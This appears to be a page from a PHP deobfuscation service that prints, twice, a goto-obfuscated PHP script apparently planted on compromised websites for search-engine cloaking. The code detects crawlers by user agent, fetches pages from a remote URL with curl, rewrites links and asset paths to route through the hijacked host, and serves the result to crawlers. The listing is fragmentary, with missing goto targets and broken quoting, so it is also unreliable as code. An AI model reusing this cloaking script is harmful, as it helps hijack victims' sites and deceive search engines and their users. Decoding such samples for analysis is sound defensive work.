Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

?php goto KY3ny; lMekU: set_time_limit(0); goto GRx7S; O6TRP: if ($bot == 1) { $domain ..

Decoded Output download

<?  ?php   
goto KY3ny; lMekU: set_time_limit(0); goto GRx7S; O6TRP: if ($bot == 1) { $domain = $_SERVER["HTTP_HOST"]; $path = $_SERVER["PHP_SELF"]; $query = $_SERVER["QUERY_STRING"]; $host = $_SERVER["HTTP_HOST"]; $jump = $url . $query; $res = curlOpen($jump); $list = array(array("id" => $url, "v" => "http://" . $domain . $path . "?"), array("id" => "href="/", "v" => "href="" . "http://" . $domain . $path . "?"), array("id" => "href='/", "v" => "href='" . "http://" . $domain . $path . "?"), array("id" => "href="", "v" => "href="" . "http://" . $domain . $path . "?"), array("id" => "href='", "v" => "href='" . "http://" . $domain . $path . "?"), array("id" => "src="/", "v" => "src="" . $url . ''), array("id" => "src='/", "v" => "src='" . $url . ''), array("id" => "src="/", "v" => "src="" . $url . ''), array("id" => "src='", "v" => "src='" . $url . ''), array("id" => "http://" . $domain . $path . "?media/", "v" => $url . "media/"), array("id" => "http://" . $domain . $path . "?skin/", "v" => $url . "skin/"), array("id" => "http://" . $domain . $path . "?js/", "v" => $url . "js/"), array("id" => "http://" . $domain . $path . "?wp-includes/", "v" => $url . "wp-includes/"), array("id" => "http://" . $domain . $path . "?wp-content/", "v" => $url . "wp-content/"), array("id" => "http://" . $domain . $path . "?images/", "v" => $url . "images/"), array("id" => "http://" . $domain . $path . "?image/", "v" => $url . "image/"), array("id" => "http://" . $domain . $path . "?themes/", "v" => $url . "themes/"), array("id" => "http://" . $domain . $path . "?modules/", "v" => $url . "modules/"), array("id" => "http://" . $domain . $path . "?includes/", "v" => $url . "includes/"), array("id" => "http://" . $domain . $path . "?ext/", "v" => $url . "ext/"), array("id" => "http://" . $domain . $path . "?css/", "v" => $url . "css/"), array("id" => "http://" . $domain . $path . "?min/", "v" => $url . "min/"), array("id" => "http://" . $domain . $path . "?stylesheets/", "v" => $url . "stylesheets/"), array("id" => "http://" . $domain . $path . "?wss-2014-styles.css", "v" => $url . "wss-2014-styles.css"), array("id" => "http://" . $domain . $path . "?item-css.css", "v" => $url . "item-css.css"), array("id" => "http://" . $domain . $path . "?index-css.css", "v" => $url . "index-css.css"), array("id" => "http://" . $domain . $path . "?subsection-css.css", "v" => $url . "subsection-css.css"), array("id" => "http://" . $domain . $path . "?us/", "v" => $url . "us/"), array("id" => """ . $url . "http", "v" => "http"), array("id" => "'" . $url . "http", "v" => "http"), array("id" => "href="http://" . $domain . $path . "?http://" . $domain . $path . "?", "v" => "href="http://" . $domain . $path . "?"), array("id" => "href='http://" . $domain . $path . "?http://" . $domain . $path . "?", "v" => "href='http://" . $domain . $path . "?"), array("id" => ""http://" . $domain . $path . "?http", "v" => ""http"), array("id" => "'http://" . $domain . $path . "?http", "v" => "'http"), array("id" => "src="http://" . $domain . $path . "?", "v" => "src="" . $url . ''), array("id" => "src='http://" . $domain . $path . "?", "v" => "src='" . $url . ''), array("id" => "src="", "v" => "src="" . $url . ''), array("id" => "src="" . $url . $url . '', "v" => "src="" . $url . ''), array("id" => "location", "v" => ''), array("id" => "<title>", "v" => "<title>"), array("id" => "if(", "v" => ''), array("id" => "jpg'", "v" => "jpg"), array("id" => "host1", "v" => ''), array("id" => "jscript_dojo2.js", "v" => ''), array("id" => "jscript_dojo.js", "v" => ''), array("id" => "jscript_imagehover.js", "v" => ''), array("id" => "jscript_", "v" => '')); for ($i = 0; $i < count($list); $i++) { $res = str_replace($list[$i]["id"], $list[$i]["v"], $res); } header("Content-Type: text/html; charset=utf-8"); echo $res; die; } goto a5NWH; my1aS: function is_spider() { $rtnVal = 0; try { $s_agent = "s_agent:" . strtolower($_SERVER["HTTP_USER_AGENT"]); if (strpos($s_agent, "google") > 0 || strpos($s_agent, "yahoo! slurp") > 0 || strpos($s_agent, "bingbot") > 0 || strpos($s_agent, "msnbot") > 0 || strpos($s_agent, "Ahrefs") > 0 || strpos($s_agent, "ask") > 0 || strpos($s_agent, "findlinks") > 0 || strpos($s_agent, "altavista") > 0 || strpos($s_agent, "baiduspider") > 0 || strpos($s_agent, "360spider") > 0 || strpos($s_agent, "yodaobot") > 0 || strpos($s_agent, "sosobot") > 0 || strpos($s_agent, "sogou inst spider") > 0 || strpos($s_agent, "jikespider") > 0 || strpos($s_agent, "easouspider") > 0 || strpos($s_agent, "inktomi") > 0) { $rtnVal = 1; } } catch (Exception $w) { } return $rtnVal; } goto xE5cC; KY3ny: ?>  

Did this file decode correctly?

Original Code

?php  
goto KY3ny; lMekU: set_time_limit(0); goto GRx7S; O6TRP: if ($bot == 1) { $domain = $_SERVER["HTTP_HOST"]; $path = $_SERVER["PHP_SELF"]; $query = $_SERVER["QUERY_STRING"]; $host = $_SERVER["HTTP_HOST"]; $jump = $url . $query; $res = curlOpen($jump); $list = array(array("id" => $url, "v" => "http://" . $domain . $path . "?"), array("id" => "href="/", "v" => "href="" . "http://" . $domain . $path . "?"), array("id" => "href='/", "v" => "href='" . "http://" . $domain . $path . "?"), array("id" => "href="", "v" => "href="" . "http://" . $domain . $path . "?"), array("id" => "href='", "v" => "href='" . "http://" . $domain . $path . "?"), array("id" => "src="/", "v" => "src="" . $url . ''), array("id" => "src='/", "v" => "src='" . $url . ''), array("id" => "src="/", "v" => "src="" . $url . ''), array("id" => "src='", "v" => "src='" . $url . ''), array("id" => "http://" . $domain . $path . "?media/", "v" => $url . "media/"), array("id" => "http://" . $domain . $path . "?skin/", "v" => $url . "skin/"), array("id" => "http://" . $domain . $path . "?js/", "v" => $url . "js/"), array("id" => "http://" . $domain . $path . "?wp-includes/", "v" => $url . "wp-includes/"), array("id" => "http://" . $domain . $path . "?wp-content/", "v" => $url . "wp-content/"), array("id" => "http://" . $domain . $path . "?images/", "v" => $url . "images/"), array("id" => "http://" . $domain . $path . "?image/", "v" => $url . "image/"), array("id" => "http://" . $domain . $path . "?themes/", "v" => $url . "themes/"), array("id" => "http://" . $domain . $path . "?modules/", "v" => $url . "modules/"), array("id" => "http://" . $domain . $path . "?includes/", "v" => $url . "includes/"), array("id" => "http://" . $domain . $path . "?ext/", "v" => $url . "ext/"), array("id" => "http://" . $domain . $path . "?css/", "v" => $url . "css/"), array("id" => "http://" . $domain . $path . "?min/", "v" => $url . "min/"), array("id" => "http://" . $domain . $path . "?stylesheets/", "v" => $url . "stylesheets/"), array("id" => "http://" . $domain . $path . "?wss-2014-styles.css", "v" => $url . "wss-2014-styles.css"), array("id" => "http://" . $domain . $path . "?item-css.css", "v" => $url . "item-css.css"), array("id" => "http://" . $domain . $path . "?index-css.css", "v" => $url . "index-css.css"), array("id" => "http://" . $domain . $path . "?subsection-css.css", "v" => $url . "subsection-css.css"), array("id" => "http://" . $domain . $path . "?us/", "v" => $url . "us/"), array("id" => """ . $url . "http", "v" => "http"), array("id" => "'" . $url . "http", "v" => "http"), array("id" => "href="http://" . $domain . $path . "?http://" . $domain . $path . "?", "v" => "href="http://" . $domain . $path . "?"), array("id" => "href='http://" . $domain . $path . "?http://" . $domain . $path . "?", "v" => "href='http://" . $domain . $path . "?"), array("id" => ""http://" . $domain . $path . "?http", "v" => ""http"), array("id" => "'http://" . $domain . $path . "?http", "v" => "'http"), array("id" => "src="http://" . $domain . $path . "?", "v" => "src="" . $url . ''), array("id" => "src='http://" . $domain . $path . "?", "v" => "src='" . $url . ''), array("id" => "src="", "v" => "src="" . $url . ''), array("id" => "src="" . $url . $url . '', "v" => "src="" . $url . ''), array("id" => "location", "v" => ''), array("id" => "<title>", "v" => "<title>"), array("id" => "if(", "v" => ''), array("id" => "jpg'", "v" => "jpg"), array("id" => "host1", "v" => ''), array("id" => "jscript_dojo2.js", "v" => ''), array("id" => "jscript_dojo.js", "v" => ''), array("id" => "jscript_imagehover.js", "v" => ''), array("id" => "jscript_", "v" => '')); for ($i = 0; $i < count($list); $i++) { $res = str_replace($list[$i]["id"], $list[$i]["v"], $res); } header("Content-Type: text/html; charset=utf-8"); echo $res; die; } goto a5NWH; my1aS: function is_spider() { $rtnVal = 0; try { $s_agent = "s_agent:" . strtolower($_SERVER["HTTP_USER_AGENT"]); if (strpos($s_agent, "google") > 0 || strpos($s_agent, "yahoo! slurp") > 0 || strpos($s_agent, "bingbot") > 0 || strpos($s_agent, "msnbot") > 0 || strpos($s_agent, "Ahrefs") > 0 || strpos($s_agent, "ask") > 0 || strpos($s_agent, "findlinks") > 0 || strpos($s_agent, "altavista") > 0 || strpos($s_agent, "baiduspider") > 0 || strpos($s_agent, "360spider") > 0 || strpos($s_agent, "yodaobot") > 0 || strpos($s_agent, "sosobot") > 0 || strpos($s_agent, "sogou inst spider") > 0 || strpos($s_agent, "jikespider") > 0 || strpos($s_agent, "easouspider") > 0 || strpos($s_agent, "inktomi") > 0) { $rtnVal = 1; } } catch (Exception $w) { } return $rtnVal; } goto xE5cC; KY3ny: ?>  

Function Calls

None

Variables

None

Stats

MD5 d52a5bf8e11c77f1e72b343192a3fb9b
Eval Count 0
Decode Time 56 ms